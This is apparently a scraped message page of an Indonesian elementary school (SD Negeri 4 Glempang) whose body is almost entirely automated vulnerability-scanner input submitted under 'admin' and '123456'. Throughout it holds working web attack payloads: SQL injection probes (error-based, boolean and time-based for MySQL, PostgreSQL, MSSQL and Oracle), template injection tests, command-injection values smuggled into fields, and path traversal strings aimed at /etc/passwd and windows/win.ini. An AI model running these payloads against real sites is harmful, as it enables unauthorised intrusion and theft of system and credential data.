SD Negeri 4 Glempang,
Karang Tunon Desa Glempang RT 7 Rw 5
Kec. Mandiraja Kab. Banjarnegara 53473
Pesan Anda
admin
123456
vphixhwwmwdvvjiuhbdl
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
vphixhwwmwdvvjiuhbdl
admin
123456
admin
123456
admin
123456
admin
123456/**/and+3=3
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1904017248)))and'
admin
123456/**/and+1=8
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1925110571)))and"
admin
123456'and'p'='p
admin
extractvalue(1,concat(char(126),md5(1699400696)))
admin
123456'and'i'='p
admin
123456'and(select'1'from/**/cast(md5(1666483587)as/**/int))>'0
admin
123456"and"a"="a
admin
123456/**/and/**/cast(md5('1611559913')as/**/int)>0
admin
123456"and"z"="m
admin
123456
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1178247534')))
admin
123456
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1516780241')))>'0
admin
123456鎈'"\(
admin
123456
admin
123456'"\(
admin
(select*from(select+sleep(0)union/**/select+1)a)
admin'and/**/extractvalue(1,concat(char(126),md5(1606326795)))and'
123456
admin
(select*from(select+sleep(2)union/**/select+1)a)
admin"and/**/extractvalue(1,concat(char(126),md5(1420767977)))and"
123456
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
extractvalue(1,concat(char(126),md5(1106976777)))
123456
admin'and(select'1'from/**/cast(md5(1246991133)as/**/int))>'0
123456
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
admin/**/and/**/cast(md5('1317881788')as/**/int)>0
123456
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1058539979')))
123456
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1834987035')))>'0
123456
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
admin鎈'"\(
123456
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
admin'"\(
123456
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
admin
123456
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
admin
123456
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
admin
123456
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
admin
123456
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
admin
123456
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
admin
123456
admin
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('e',0)
admin
123456
admin
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('s',2)
admin
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s
admin
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',2)='n
admin'and'u'='u
123456
admin'and'p'='w
123456
admin"and"s"="s
123456
admin"and"y"="r
123456
admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456
admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456
admin'and(select+1)>0waitfor/**/delay'0:0:0
123456
admin'and(select+1)>0waitfor/**/delay'0:0:2
123456
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='m
123456
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',2)='t
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456/**/and+2=2
admin'and/**/extractvalue(1,concat(char(126),md5(1905025821)))and'
123456
admin
123456/**/and+4=7
admin"and/**/extractvalue(1,concat(char(126),md5(1957678940)))and"
123456
admin
123456'and'r'='r
extractvalue(1,concat(char(126),md5(1547701734)))
123456
admin
123456'and'u'='y
admin'and(select'1'from/**/cast(md5(1076665953)as/**/int))>'0
123456
admin
123456"and"i"="i
admin/**/and/**/cast(md5('1204787253')as/**/int)>0
123456
admin
123456"and"o"="w
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1378200476')))
123456
admin
123456
admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1060645343')))>'0
123456
admin
123456
admin鎈'"\(
123456
admin
123456
admin'"\(
123456
admin
(select*from(select+sleep(0)union/**/select+1)a)
admin
123456
admin
(select*from(select+sleep(2)union/**/select+1)a)
admin
123456
admin
123456
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
admin
123456
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
admin
123456
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin
123456
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin
123456
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
admin
123456
admin
123456
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1239022563)))and'
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1655893382)))and"
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
admin
extractvalue(1,concat(char(126),md5(1243416073)))
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
admin
123456'and(select'1'from/**/cast(md5(1694535537)as/**/int))>'0
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
admin
123456/**/and/**/cast(md5('1667953431')as/**/int)>0
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1100302633')))
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1428722536')))>'0
admin
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('g',0)
admin
123456鎈'"\(
admin
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('g',2)
admin
123456'"\(
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',2)='z
admin'and'z'='z
123456
admin'and'r'='o
123456
admin"and"y"="y
123456
admin"and"w"="n
123456
admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456
admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456
admin'and(select+1)>0waitfor/**/delay'0:0:0
123456
admin'and(select+1)>0waitfor/**/delay'0:0:2
123456
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z
123456
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',2)='y
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin'and'e'='e
123456
admin'and/**/extractvalue(1,concat(char(126),md5(1352217466)))and'
123456
admin'and'y'='l
123456
admin"and/**/extractvalue(1,concat(char(126),md5(1366225275)))and"
123456
extractvalue(1,concat(char(126),md5(1234881857)))
123456
admin"and"x"="x
123456
admin'and(select'1'from/**/cast(md5(1724925626)as/**/int))>'0
123456
admin"and"o"="k
123456
admin/**/and/**/cast(md5('1626136008')as/**/int)>0
123456
admin
123456
admin
123456
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1930629392')))
123456
admin
123456
admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1959254208')))>'0
123456
admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
admin鎈'"\(
123456
admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
admin'"\(
123456
admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
admin
123456
admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
admin
123456
admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456
admin
123456
admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456
admin
123456
admin'and(select+1)>0waitfor/**/delay'0:0:0
123456
admin
123456
admin'and(select+1)>0waitfor/**/delay'0:0:2
123456
admin
123456
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',0)='f
123456
admin
123456
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',2)='f
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1771710281)))and'
admin
123456
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1340501784)))and"
admin
123456
admin
extractvalue(1,concat(char(126),md5(1047724694)))
admin
123456
admin
123456'and(select'1'from/**/cast(md5(1258208589)as/**/int))>'0
admin
123456
admin
123456/**/and/**/cast(md5('1227484117')as/**/int)>0
admin
123456
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1276497654')))
admin
123456
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1009721376')))>'0
admin
123456
admin
123456鎈'"\(
admin
123456
admin
123456'"\(
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456/**/and+4=4
admin
123456/**/and+3=8
admin
123456'and's'='s
admin
123456'and'y'='f
admin
123456"and"a"="a
admin
123456"and"i"="g
admin
(select*from(select+sleep(0)union/**/select+1)a)
admin
(select*from(select+sleep(2)union/**/select+1)a)
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
admin
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('d',0)
admin
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('a',2)
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',2)='c
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin'and/**/extractvalue(1,concat(char(126),md5(1406948643)))and'
123456
admin
123456
admin
123456
admin"and/**/extractvalue(1,concat(char(126),md5(1398860731)))and"
123456
extractvalue(1,concat(char(126),md5(1180980177)))
123456
admin
123456/**/and+4=4
admin'and(select'1'from/**/cast(md5(1554089012)as/**/int))>'0
123456
admin
123456/**/and+4=9
admin/**/and/**/cast(md5('1589576840')as/**/int)>0
123456
admin
123456'and'q'='q
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1765131694')))
123456
admin
123456'and'q'='w
admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1575035365')))>'0
123456
admin
123456"and"w"="w
admin
123456"and"u"="t
admin鎈'"\(
123456
admin
123456
admin'"\(
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
(select*from(select+sleep(0)union/**/select+1)a)
admin
123456
admin
(select*from(select+sleep(2)union/**/select+1)a)
admin
123456
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
admin
123456
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
admin
123456
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin
123456
admin
123456
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin
123456
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1126459919)))and'
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1733442008)))and"
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
admin
extractvalue(1,concat(char(126),md5(1380280127)))
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
admin
123456'and(select'1'from/**/cast(md5(1168828869)as/**/int))>'0
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
admin
123456/**/and/**/cast(md5('1286729322')as/**/int)>0
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1522398091')))
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1015448192')))>'0
admin
123456鎈'"\(
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
admin
123456'"\(
admin
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('q',0)
admin
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('a',2)
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',0)='c
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',2)='v
admin'and'g'='g
123456
admin'and'u'='r
123456
admin"and"n"="n
123456
admin"and"e"="c
123456
admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456
admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456
admin'and(select+1)>0waitfor/**/delay'0:0:0
123456
admin'and(select+1)>0waitfor/**/delay'0:0:2
123456
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',0)='b
123456
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',2)='l
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
/*1*/{{997216533+858017495}}
admin
${925624771+896014799}
admin
${@var_dump(md5(605311119))};
admin
123456
admin
123456
admin
'-var_dump(md5(623047693))-'
admin
${976257920+906940645}
${965473623+922664486}
123456
admin
123456
admin
123456
admin
123456
${@var_dump(md5(413127036))};
123456
admin
123456
admin
123456
admin
${(983130816+947912231)?c}
admin
123456
admin
123456
'-var_dump(md5(849399401))-'
123456
admin
#set($c=915559644+892609796)${c}$c
admin
123456/**/and+1=1
admin
123456
admin
123456
admin
123456
admin
<%- 828596253+996147408 %>
admin
123456/**/and+3=9
admin
123456
admin
123456
admin
123456
/*1*/{{844964285+919741179}}
123456
admin
123456
admin
123456'and'u'='u
admin
123456 expr 870379548 + 890322332
${956662682+827796817}
123456
admin
123456'and'b'='a
admin
123456
${(870705517+800491449)?c}
123456
admin
123456|expr 858291883 + 974660231
admin
123456$(expr 980165379 + 943799298)
admin
123456"and"z"="z
#set($c=800583908+984481338)${c}$c
123456
admin
123456
admin
123456&set /A 905867857+993121728
admin
123456"and"x"="r
<%- 908480426+877091580 %>
123456
admin
123456
admin
expr 804298105 + 939397513
admin
123456
admin
123456
admin
123456
admin
123456
admin expr 834891113 + 894425033
123456
admin
123456
admin|expr 877298769 + 909167713
123456
admin
123456
admin
123456
admin
123456
admin
(select*from(select+sleep(0)union/**/select+1)a)
admin
123456
admin$(expr 813595042 + 861506297)
123456
admin&set /A 842183722+891855890
123456
admin
(select*from(select+sleep(2)union/**/select+1)a)
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1991638350)))and'
admin
123456
expr 875421813 + 950869402
123456
admin
123456
admin
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1570261534)))and"
admin
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
admin
extractvalue(1,concat(char(126),md5(1574836715)))
admin
123456'and(select'1'from/**/cast(md5(1399206745)as/**/int))>'0
admin
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
admin
123456/**/and/**/cast(md5('1865808546')as/**/int)>0
admin
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1934672217')))
admin
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1808385792')))>'0
admin
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
admin
123456鎈'"\(
admin
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
admin
123456'"\(
admin
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
admin'and/**/extractvalue(1,concat(char(126),md5(1494745201)))and'
123456
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
admin"and/**/extractvalue(1,concat(char(126),md5(1384607831)))and"
123456
admin
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
extractvalue(1,concat(char(126),md5(1609750954)))
123456
admin
123456'and(select+1)>0waitfor/**/delay'0:0:0
admin'and(select'1'from/**/cast(md5(1013078855)as/**/int))>'0
123456
admin
123456'and(select+1)>0waitfor/**/delay'0:0:2
admin/**/and/**/cast(md5('1007453349')as/**/int)>0
123456
admin
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('y',0)
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1052973438')))
123456
admin
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('x',2)
admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1920795099')))>'0
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('r',0)='r
admin鎈'"\(
123456
admin
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',2)='n
admin'and'r'='r
123456
admin'"\(
123456
admin'and'z'='a
123456
admin"and"d"="d
123456
admin"and"d"="s
123456
admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456
admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456
admin'and(select+1)>0waitfor/**/delay'0:0:0
123456
admin'and(select+1)>0waitfor/**/delay'0:0:2
123456
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',0)='t
123456
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',2)='y
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
${936938615+905156093}
123456
../../../../../../../../../../../../../../../../../../etc/passwd
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
../../../../../../../../../../../../../../../../../../etc/passwd admin
123456
admin
123456
admin
123456
admin
123456
admin
123456
./../../../../../../../../../../../../../../../../../../etc/passwd
123456
admin
${852014296+832170570}
admin
123456
admin
123456
admin
123456
admin
${@var_dump(md5(863066369))};
admin
123456
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
123456
admin
123456
admin
'-var_dump(md5(533489215))-'
admin
123456
admin
123456
admin'and'w'='w
123456
admin
123456
admin
123456
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin
123456
${@var_dump(md5(993656527))};
123456
admin'and'f'='n
123456
admin
123456 expr 807002995 + 865812906
../../../../../../etc/passwd
123456
'-var_dump(md5(946455955))-'
123456
admin
123456
admin
/*1*/{{929446245+917033079}}
admin"and"i"="i
123456
admin
123456|expr 854239379 + 979500871
../../../../../../etc/passwd admin
123456
admin
123456
admin
${901941583+863945821}
admin"and"m"="n
123456
admin
123456
admin
123456$(expr 961074168 + 833368462)
admin
${(852420447+871609025)?c}
admin
123456
./../../../../../../etc/passwd
123456
admin
123456&set /A 969649792+914588070
admin
123456
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
123456
admin
123456
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin
#set($c=946673909+814052753)${c}$c
admin
123456
admin
expr 890023310 + 959988734
admin
123456
admin
<%- 982673512+804002785 %>
/etc/passwd
123456
admin
123456
admin expr 893827669 + 945413793
123456
admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
/*1*/{{837623457+886488325}}
123456
/etc/passwd admin
123456
admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
admin
123456
admin|expr 819474748 + 874740903
123456
${988551070+885544191}
123456
%2fetc%2fpasswd
123456
admin$(expr 992511424 + 827209143)
123456
admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
%u2215etc%u2215passwd
123456
admin
123456
${(801860415+985699599)?c}
123456
admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
admin&set /A 950164416+901893745
123456
admin
123456'and/**/extractvalue(1,concat(char(126),md5(1669883623)))and'
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
123456
#set($c=975095735+816777108)${c}$c
123456
expr 959137017 + 928812225
123456
admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456
admin
123456"and/**/extractvalue(1,concat(char(126),md5(1513313810)))and"
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
123456
<%- 879719532+886479616 %>
123456
admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456
admin
extractvalue(1,concat(char(126),md5(1562834601)))
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini admin
123456
admin
123456'and(select'1'from/**/cast(md5(1661298737)as/**/int))>'0
admin'and(select+1)>0waitfor/**/delay'0:0:0
123456
admin'and(select+1)>0waitfor/**/delay'0:0:2
123456
admin
123456/**/and/**/cast(md5('1418152429')as/**/int)>0
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%
123456
admin
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1163740806')))
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',0)='u
123456
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
admin
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1548829643')))>'0
admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',2)='g
123456
..\..\..\..\..\..\windows/win.ini
123456
admin
123456鎈'"\(
admin
123456'"\(
admin
123456
.\..\..\..\..\..\..\windows/win.ini
123456
admin
123456
admin'and/**/extractvalue(1,concat(char(126),md5(1259300256)))and'
123456
..\..\..\..\..\..\windows/win.ini admin
123456
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini
123456
admin
123456
admin"and/**/extractvalue(1,concat(char(126),md5(1756926558)))and"
123456
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
admin
123456
extractvalue(1,concat(char(126),md5(1145256078)))
123456
../../../../../../../../../../../../../../../../../../windows/win.ini
123456
admin
123456
admin'and(select'1'from/**/cast(md5(1960532759)as/**/int))>'0
123456
./../../../../../../../../../../../../../../../../../../windows/win.ini
123456
admin
123456
admin/**/and/**/cast(md5('1436095698')as/**/int)>0
123456
../../../../../../../../../../../../../../../../../../windows/win.ini admin
123456
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1613601463')))
123456
admin
123456
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
123456
admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1482457120')))>'0
123456
admin
123456
admin鎈'"\(
123456
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin
123456
../../../../../../windows/win.ini
123456
admin'"\(
123456
admin
123456
admin
123456
./../../../../../../windows/win.ini
123456
../../../../../../windows/win.ini admin
123456
admin
123456
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini
123456
admin
123456
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin
123456
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
123456
admin
123456
admin
123456
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
123456
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini admin
123456
admin
123456
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%
123456
admin
123456
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
admin
123456
..\..\..\..\..\..\windows/win.ini
123456
admin
123456
.\..\..\..\..\..\..\windows/win.ini
123456
admin
123456
..\..\..\..\..\..\windows/win.ini admin
123456
admin
123456
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini
123456
admin
123456
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00
123456
admin
123456
../../../../../../../../../../../../../../../../../../windows/win.ini
123456
admin
123456/**/and+0=0
./../../../../../../../../../../../../../../../../../../windows/win.ini
123456
../../../../../../../../../../../../../../../../../../windows/win.ini admin
123456
admin
123456/**/and+0=6
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
123456
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
admin
123456'and'f'='f
../../../../../../windows/win.ini
123456
./../../../../../../windows/win.ini
123456
admin
123456'and'h'='k
../../../../../../windows/win.ini admin
123456
admin
123456"and"b"="b
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini
123456
admin
123456"and"s"="u
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00
123456
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
123456
admin
(select*from(select+sleep(0)union/**/select+1)a)
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
123456
admin
(select*from(select+sleep(2)union/**/select+1)a)
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini admin
123456
admin
